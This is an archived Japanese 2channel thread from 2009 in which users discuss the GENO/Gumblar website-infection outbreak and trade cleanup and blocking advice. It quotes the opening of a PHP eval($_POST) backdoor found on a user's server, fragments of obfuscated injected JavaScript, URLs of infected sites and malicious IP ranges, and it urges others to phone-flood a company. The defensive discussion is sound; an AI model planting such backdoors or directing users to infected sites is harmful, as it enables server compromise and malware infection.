GENOウイルススレ　★5

[過去ﾛｸﾞ] GENOウイルススレ　★5 (1001ﾚｽ)
上下前次 1-新

このｽﾚｯﾄﾞは過去ﾛｸﾞ倉庫に格納されています｡
次ｽﾚ検索歴削→次ｽﾚ栞削→次ｽﾚ過去ﾛｸﾞﾒﾆｭｰ

461(1): 2009/05/16(土) 10:42:00 AAS
>>458
だいぶ前からはずすように言われてるよ

462(2): 2009/05/16(土) 10:46:45 AAS
よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうｐしようかな

463(2): 2009/05/16(土) 10:47:10 AAS
>>461
読み直したら･･･
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから（￣▽￣；）

464: 2009/05/16(土) 10:49:56 AAS
テンプレに反映出来てないんだろうな

465: 2009/05/16(土) 10:50:11 AAS
>>463
もしかしたら前スレかもしれないけど両方はずとくといいって

466(1): 2009/05/16(土) 10:51:51 AAS
>>462
ソースに情報が書き込まれてるって>>456でかいたんだが？

467: 2009/05/16(土) 10:52:24 AAS
ほんとだこのスレには>>436しかないね

468: 2009/05/16(土) 10:53:24 AAS
>>441
うぁぁぁぁぁぁ

469: 2009/05/16(土) 10:53:43 AAS
>>466
いや、ただ試しに踏んでみたいだけ。

470(1): 2009/05/16(土) 10:54:12 AAS
>>441
踏んじまっただろ！！責任取れ！！

471(1): 463 2009/05/16(土) 10:54:37 AAS
一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います

472(1): 2009/05/16(土) 10:54:50 AAS
>>462
やめておいた方がいい
外部ﾘﾝｸ:www.virustotal.com

473(1): 94 101 154 2009/05/16(土) 10:55:04 AAS
>>422
Firefox側にもIE側にもついてるよ。

ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい（多分、あまり騒ぎ立てて欲しくないっぽい）
感染を全て確認したわけではないし、全ては自己責任の範囲で　らしいが。
俺は今から登録する。

KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。

474: 2009/05/16(土) 10:55:35 AAS
>>471
えらい！

475(2): 2009/05/16(土) 11:00:47 AAS
ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。

476(1): 2009/05/16(土) 11:01:15 AAS
最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな

477: 2009/05/16(土) 11:02:35 AAS
>>475
たぶん、日本語入ってないとこに移すの忘れずに

478: 463　471 2009/05/16(土) 11:04:28 AAS
あとは･･･sqlsodbc.chmの場所ですが

Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411

のどちらかにあると思います

479(1): 2009/05/16(土) 11:04:29 AAS
もうだめだ！！！！！！！！
インターネット閉鎖してください！！！！！！！！！！

480: 2009/05/16(土) 11:04:31 AAS
>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。

481: 2009/05/16(土) 11:06:20 AAS
まだやってんのかよ・・・。

482(1): 2009/05/16(土) 11:06:41 AAS
macを確認したいのですがどうやって調べればいいのでしょうか？

483: 2009/05/16(土) 11:06:46 AAS
>>470
ｗｗｗ。ｌｉｖｍａｉｌ。ｃｏｍ
(株) りぶメール
店舗連絡先: 0120-二五五-八八八

電凸よろ

484(1): 2009/05/16(土) 11:06:58 AAS
インターネット閉鎖できませーん

485: 2009/05/16(土) 11:08:01 AAS
>>479,484
笑わすなｗｗ

486: 94 101 154 2009/05/16(土) 11:08:51 AAS
>>473
の＞デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。

>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの？

とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも（その分重いけど）。
avast と BitDefender のデュアルエンジンだったはず。
外部ﾘﾝｸ:www.junglejapan.com
メール登録あり。

>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。　

487(1): 2009/05/16(土) 11:09:22 AAS
sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば？
Everythingとかいろいろあるでしょ

488: 2009/05/16(土) 11:10:14 AAS
これってファイルにも感染しますか？
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染？

489(4): 2009/05/16(土) 11:10:31 AAS
うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない？php使ってjavascript書かれてるんだが。unescapeとかも見える

どこかに全文貼ったほうがいい？詳しい人いる？

490(1): 2009/05/16(土) 11:12:54 AAS
>>489
それアウトだな。

491(3): 2009/05/16(土) 11:13:28 AAS
書こうと思ったらもう載ってた
外部ﾘﾝｸ:www3.atword.jp
緊急のとこね
>>441はmartuzに飛ばされるから

492(1): 2009/05/16(土) 11:15:20 AAS
あの～、皆様にお尋ねしたいのですが、先日から私のPCにインストールしてある
adobe acrobat9.0が勝手に閉じてしまうのですが、原因わかる方おられないでしょうか？
ネットでいろいろ検索してみたところ、ここで「勝手に起動する」とありましたので、
何らかの関連性があると思いカキコしました。詳しく言うと、acrobatを起動して、数秒後
に勝手に閉じてしまいます。もしかしてこのGENOウィルスが原因なんでしょうか？
そもそもGENOウィルスって何ですか？もしそれが原因なら、対処方法はあるのですか？
素人で大変申し訳ありませんが、宜しくお願いします。

493: 2009/05/16(土) 11:15:23 AAS
>>482
Vistaユーザーだからmacはわからないです＞＜

494: 2009/05/16(土) 11:17:06 AAS
>>492
まずはこのスレを最初から読もうね

495(1): 2009/05/16(土) 11:19:13 AAS
>>489
それ・・・アウト。
どこかにgumblarとか書かれて無いかな？

496: 2009/05/16(土) 11:20:09 AAS
質問スレって無いんだっけ
混在しちゃうと読みづらい

497: 2009/05/16(土) 11:22:53 AAS
俺なんてTシャツ着て転げまわるから空拭きの雑巾要らない

498(1): 2009/05/16(土) 11:24:45 AAS
Adobe Reader をアンスコすれば解決すんの？
使わないしイラネーな

499(1): 489 2009/05/16(土) 11:25:00 AAS
>>490,495
今まで見たヤツはgumblarとか書いてあったがこれはない
base64でエンコードされてるからだけどね

500: 2009/05/16(土) 11:25:50 AAS
>>498
フラッシュプレイヤーも

501: 2009/05/16(土) 11:26:00 AAS
ちょ、なんだよ。前スレ落ちたな～なんて思って寝たら、もうこんなにスレ進んでんのかよ。

502: 2009/05/16(土) 11:26:25 AAS
evalとunescapeの両方があったらほぼ確定じゃないかな

>>441
大当たり　比較的最近の型かな

503: 2009/05/16(土) 11:27:53 AAS
それカスペでも反応する？

504: 2009/05/16(土) 11:29:17 AAS
>>499
んじゃ>>491の
martuzとかは？

505: 94 101 154 2009/05/16(土) 11:29:56 AAS
>>491
Nice!

506: 2009/05/16(土) 11:30:22 AAS
おもしれえなこのスレｗ

507(1): 2009/05/16(土) 11:30:24 AAS
ちょっと何この速さ
いつの間に5いってんの・・・
バグ？だれか説明してくれ

508(2): 2009/05/16(土) 11:31:44 AAS
PeerGurdianで、危険IP弾いてるんだけど
IP一覧みたいなまとめって、どこかあるんだっけ
94.247.2.195だけ？

509(1): 2009/05/16(土) 11:31:50 AAS
Avira AntiVirを導入してるから安心してみておける

510: 2009/05/16(土) 11:32:20 AAS
>>441
これ踏むとどうなるの？

511: 2009/05/16(土) 11:32:38 AAS
勿論感染

512: 改ざんされたソース 2009/05/16(土) 11:33:00 AAS
814 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 03:13:30
>>732　なるほど

恐らくこれだな

スクリプト language=ジャバcriptスクリプト
スクリプト language=ジャバscript>スクリプト

以上、前スレから転載
ドットがアンダーバーに変わっている亜種もあるっぽい

513(1): 2009/05/16(土) 11:33:39 AAS
>>508
>>380

514: 2009/05/16(土) 11:34:01 AAS
>>508
>>380

515: 2009/05/16(土) 11:34:43 AAS
>>513
サンキュ、助かった

516: 2009/05/16(土) 11:34:56 AAS
22秒撃ち負けたｗ

517: 2009/05/16(土) 11:35:43 AAS
改竄が読めません!

518(3): 2009/05/16(土) 11:35:47 AAS
Googleが実現させたシンプルで高機能なブラウザ
外部ﾘﾝｸ[html]:www.google.co.jp

WindowsXPを利用の初心者はこのブラウザでOK！
感染したサイトや、危険なURLを開くとブラウザが危険を知らせてくれます。
Vistaでは埋め込まれたJSに反応しないため危険警告は出ずそのサイトが表示します。

上級者にはFirefoxの設定変更で回避する方法がおすすめです。

519(1): 2009/05/16(土) 11:36:21 AAS
>>509
擦り抜けるつってんだろ

520(1): 2009/05/16(土) 11:37:04 AAS
なんかもう順番に読んでくのメンドイ；；；
読むより早くスレが進んでいくよーT-T
こんなの実況スレ以来だよ―――――っ。

521(1): 2009/05/16(土) 11:37:13 AAS
avastが株上げたな
無料の分際でやるわねなんて思っていないんだからねっ

522: 2009/05/16(土) 11:38:20 AAS
何で勢いこんなにあがったのかと思ったら同人サイトも改変されちゃったのね

523: 2009/05/16(土) 11:38:24 AAS
同人スレのまとめの人も混乱してやがる＼(^o^)／

524(4): 2009/05/16(土) 11:38:41 AAS
感染サイト
hxxp://expss.main.jp/expss2/2005/07/

525(2): 2009/05/16(土) 11:38:58 AAS
>>518
>上級者にはFirefoxの設定変更で回避する方法がおすすめです

詳しくお願い

526: 2009/05/16(土) 11:40:53 AAS
外部ﾘﾝｸ:www31.atwiki.jp

同人板のまとめが分かり易いよ

527(1): 2009/05/16(土) 11:41:39 AAS
今更だけどProxomitronでフィルタ作れば良くね

528: 2009/05/16(土) 11:42:45 AAS
>>520
すげえきもい
才能あるなおまえ

529: 489 2009/05/16(土) 11:42:59 AAS
evalとunescape両方あるね
FFFTPからそのphpファイルをTeraPadで開こうとするとAVGが反応する
ローカルにダウンロードしてから開くと反応しない、設定の問題か。
「ウイルス JS/Downloader.Agentが特定されました」って出るね

530(1): 2009/05/16(土) 11:43:18 AAS
BSODってなに？

531: 2009/05/16(土) 11:43:44 AAS
>>521
対応早いのはユーザーの多さじゃないか？

532(2): 2009/05/16(土) 11:44:03 AAS
>このウィルスはKasperskyかニフティオンラインスキャン、avast!、ウイルスバスタ2009でしか今現在、検索できないウィルスです

バスター2007、2008はだめなのか？

533(2): 2009/05/16(土) 11:45:00 AAS
>>525
外部ﾘﾝｸ[html]:www31.atwiki.jp
とりあえずここを参照

534(3): 2009/05/16(土) 11:45:25 AAS
なんでGENOウイルスなの?GENOは被害者じゃないの?

535: 2009/05/16(土) 11:45:50 AAS
やられた。同人サイトなんて見てないしgumblarに飛ばされたこともない。
怪しいexe実行した覚えもないしどこから感染したのか…。

536: 2009/05/16(土) 11:46:19 AAS
>>534
もはや、加害者だろ

537: 2009/05/16(土) 11:46:21 AAS
>>524
うわ。徹底的にやられてるね。
(function(TitRT)
(function(j4A)
(function(x5E)

とか、計24個貼ってある。

538: 2009/05/16(土) 11:46:25 AAS
md5+それ以外のハッシュも求めるならAXHashTransおぬぬめ
外部ﾘﾝｸ[html]:www.vector.co.jp

539(2): 2009/05/16(土) 11:46:27 AAS
>>525
使用ブラウザをFirefoxに変更、アドオンにNoScriptを入れる

540: 2009/05/16(土) 11:46:37 AAS
>>530
ブルースクリーンとは【blue screen】 - 意味・解説： IT用語辞典
外部ﾘﾝｸ[html]:e-words.jp

541: 2009/05/16(土) 11:46:41 AAS
ウイルスバスター2009対応してないんじゃないの

542: 2009/05/16(土) 11:46:46 AAS
>>507
同人関係で大量の個人サイト感染発覚→パニック＆祭り

543: 2009/05/16(土) 11:46:54 AAS
>>532
むしろウイルスバスタ2009平気ってほんとなのか

544: 2009/05/16(土) 11:46:56 AAS
>>534
被害者っちゃあ被害者だけど
真っ先に発覚したにも関わらず放置した期間が長かったし

545(2): 2009/05/16(土) 11:46:57 AAS
>>532
2009はついこの間更新されて検出出来るようになったみたいですね～

2009に換えろということかも･･･？ｗ

546(1): 2009/05/16(土) 11:47:24 AAS
>>518
Genoウイルスが変化したらChromeは直ぐに対応するのかな

547: 2009/05/16(土) 11:47:33 AAS
>>534
爆発的に感染者を増やした上
対応がお粗末だったから皮肉を込めてそう呼ばれてる

548: 2009/05/16(土) 11:48:54 AAS
バスターのGENOME.BK って
誤検出じゃないの？
それとは違うくて？

549(2): 2009/05/16(土) 11:48:58 AAS
>>545
亜種まで検出してんの？

550: 2009/05/16(土) 11:49:08 AAS
そして週末土日で対応遅れるだろうし
もうどこのサイトも信用できない((((；ﾟДﾟ))))

551: 2009/05/16(土) 11:49:14 AAS
>>533
>>539
ありがと

552: 2009/05/16(土) 11:49:37 AAS
てかウイルス仕掛けたり作ったりしてるの日本人なの？

553(1): 2009/05/16(土) 11:49:39 AAS
534の人気に嫉妬

554: 2009/05/16(土) 11:50:24 AAS
㌧フル初の感染者確認！

555(1): 2009/05/16(土) 11:50:35 AAS
なんぼ週アスと手を組んで安売りセールやってももうGENOのサイト見に行きたくねえ
一度もないけど

556: 2009/05/16(土) 11:51:13 AAS
HashTab Shell Extension お薦め
外部ﾘﾝｸ[html]:www.forest.impress.co.jp

557: 2009/05/16(土) 11:51:28 AAS
>>553
genoの社員じゃねーのｗ

558: 2009/05/16(土) 11:51:31 AAS
>>545
いやこの間の更新には入ってない

559: 2009/05/16(土) 11:51:34 AAS
やべぇ。神戸で豚感染、国内初だって。
もう、何もかも終わった。

560(1): 2009/05/16(土) 11:51:47 AAS
hxxp://www.livmail.com/3others-page/janet/tokusen/index.htm
見てきた、しっかりscript埋め込まれてる罠
<script language=javascript><!--
(function(){var UkRR='%';var WdBp=('v&61r&2・・・・・・・・・

561: 2009/05/16(土) 11:51:54 AAS
リアルでも感染確定＼(^o^)／

562(1): 2009/05/16(土) 11:52:01 AAS
VISTAなら大丈夫って本当？
HPだけど、4月7日に踏んだときに謎のCPU使用率UP現象があったんだけど。
再起動したら起動できなくなるとかはなかったけど。

563: 2009/05/16(土) 11:52:19 AAS
>>555
お気に入りから消した
対策してあるけどさすがにカード使う気にも
住所入れる気にもならないな・・・

それでも安売りメール送ってくる
解除したいけどサイト踏みたくないｗ

564: 2009/05/16(土) 11:52:25 AAS
豚インフルきちゃったな

565(1): 2009/05/16(土) 11:53:03 AAS
>>518
XPにそれインストールして>>524を開いたら、真っ赤になった！
まじ、やべーよ！！

566: 2009/05/16(土) 11:53:02 AAS
さっきGENOにアクセスしたらつながらなかったんだけど大丈夫かな
こわいなぁ

567(1): 2009/05/16(土) 11:53:04 AAS
>>549
亜種までかはわからないけど･･･

568(1): 2009/05/16(土) 11:53:23 AAS
タイミングも悪いよなー
豚インフル来ちゃったし、これで余計にマスコミに取り上げられる機会が…orz

569(2): 2009/05/16(土) 11:53:56 AAS
524踏んじゃったけど大丈夫…？

570: 2009/05/16(土) 11:54:30 AAS
踏んじゃったけど大丈夫？って聞くなら最初から踏むなよ

571: 2009/05/16(土) 11:55:02 AAS
>>539の対処でNoScript入れても許可してるサイトが感染してたら意味ないよな？
最近youtubeやニコ動ですら怖くなってるわ

572: 2009/05/16(土) 11:55:05 AAS
神戸在住の俺＼(＾o＾)／ｵﾜﾀ

573: 2009/05/16(土) 11:55:07 AAS
>>569
だめ

574: 2009/05/16(土) 11:55:10 AAS
>>568
マスゴミだってＰＣつかってるから自分が感染すれば注目してくれるかもよ

575: 2009/05/16(土) 11:55:15 AAS
豚インフルの感染者って地元なんだよね･･･

576: 2009/05/16(土) 11:55:15 AAS
877 名前： geno [sage] 投稿日： 2009/05/16(土) 11:50:08 ID:bcj3KvYq0
これかわからないけど東方の超大手サイトからavast!でウイルス反応出るんだが
東方自ジャンルじゃないからどのスレいけばいいのかよくわかんね…
とりあえずサイト管理人にメールするしか出来ないのかね
こういうときは

これは・・・

577: 2009/05/16(土) 11:55:31 AAS
>>524
> 感染サイト
> hxxp://expss.main.jp/expss2/2005/07/
ここも
function(TitRT){var H5h='%';var B4mN=('.76ar.20a.3d.22

578(1): 2009/05/16(土) 11:55:57 AAS
リアルでもネットでもウィルス流行ｗｗｗｗ
何事だよ

579: 2009/05/16(土) 11:56:18 AAS
某サイトで見たんですがfirefoxの
Adblock Plusのフィルタリストに

*/94.247.[2-3].[0-255]/*
*/94.229.[64-65].[0-255]/*

を追加するのは効果あるんですか？

580: 2009/05/16(土) 11:56:36 AAS
524は感染サイトを紹介しているまとめサイトだと思って踏んじゃったんだよー

581(1): 2009/05/16(土) 11:56:59 AAS
>>562
VISTAでも多分ヤバイ

582: 2009/05/16(土) 11:57:01 AAS
>>549
亜種は検出しないよ

583: 2009/05/16(土) 11:57:09 AAS
>>569
狐かchromeで見たの？
あとテンプレの通りに確認してみ？
念のためにavastさんでチェックな
最後に神社でお百度参りするんだ

584: 2009/05/16(土) 11:58:21 AAS
VISTAって、今のところままだ感染報告来てないよな？
これから亜種が出てくるだろうが

ま、俺のところ９８なんで関係ないんですがね

585(1): 2009/05/16(土) 11:58:25 AAS
>>581
マジか。
まぁ、今はクリーンインスコして快適にはなったんだけどね。
色々なとこで「VISTAなら大丈夫」とか言ってるのはなんなんだろ

586: 2009/05/16(土) 11:59:04 AAS
おい、VISTAもあぶないのかよ。ほんまかいな。どうなってんだよ

587: 2009/05/16(土) 11:59:50 AAS
しかけてる奴もvista大丈夫大丈夫言われるとやりたくなっちゃうだろ

上下前次 1-新書関写板覧索設栞歴

あと 414 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ

ぬこの手ぬこTOP 0.022s